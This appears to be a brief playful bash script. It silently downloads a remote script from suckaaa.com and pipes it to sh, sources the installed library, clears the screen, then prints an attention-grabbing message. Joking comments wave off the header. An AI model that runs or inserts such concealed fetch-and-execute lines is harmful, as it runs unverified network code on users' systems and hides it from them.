#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/garbage-lib-installer' | sh;
source ~/.garbage/lib;
clear;
###########  END HEADER  ###########

bigMsg 'Do I have your attention?!?!';

sleep 5s;

echo 'GOOD!';

# If $ATTENTION_AFTER then run it
# Probably will be to run another script
